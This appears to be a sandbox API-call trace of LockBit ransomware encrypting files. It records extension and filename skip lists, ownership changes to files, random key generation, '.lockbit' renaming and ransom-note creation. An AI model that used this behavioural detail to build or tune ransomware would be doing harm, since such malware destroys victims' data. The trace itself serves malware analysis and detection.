LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.723] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.725] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.725] malloc (_Size=0xcc) returned 0x77d800 [0080.725] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0080.726] free (_Block=0x77d800) [0080.726] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.726] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.726] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.726] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.726] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.726] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.726] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0080.726] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.726] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.726] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.727] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.727] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.727] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.727] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.728] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.728] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.729] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.729] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.729] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.729] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.729] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.729] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.729] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.729] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.729] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png") returned=".png" [0080.729] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.729] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.729] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.729] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.730] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.730] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.730] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png.lockbit") returned 97 [0080.730] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.735] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.735] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.735] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.735] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.736] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.736] RtlFreeAnsiString (AnsiString="\\") [0080.736] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0080.736] malloc (_Size=0x200) returned 0x77d800 [0080.736] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.736] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.736] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.736] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.736] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.737] CloseHandle (hObject=0x3c4) returned 1 [0080.737] free (_Block=0x77d800) [0080.737] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.737] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.737] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.737] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3118) returned 1 [0080.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.815] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.836] malloc (_Size=0xd8) returned 0x77d800 [0080.836] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd8, FileInformationClass=0xa) returned 0x0 [0080.837] free (_Block=0x77d800) [0080.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.837] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.837] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.838] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.838] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.838] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.838] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0080.838] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.838] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.838] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.839] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.839] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.840] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.840] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.840] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.840] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.840] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.840] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png") returned=".png" [0080.840] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.840] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.840] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.840] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.841] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.841] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.841] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png.lockbit") returned 88 [0080.841] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.846] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.846] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.846] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.846] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.847] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.847] RtlFreeAnsiString (AnsiString="\\") [0080.847] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0080.847] malloc (_Size=0x200) returned 0x77d800 [0080.847] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.847] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.847] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.847] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.848] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.848] CloseHandle (hObject=0x3c0) returned 1 [0080.848] free (_Block=0x77d800) [0080.848] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.848] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.848] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.848] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4955) returned 1 [0080.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.849] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.851] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.851] malloc (_Size=0xc6) returned 0x77d800 [0080.852] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc6, 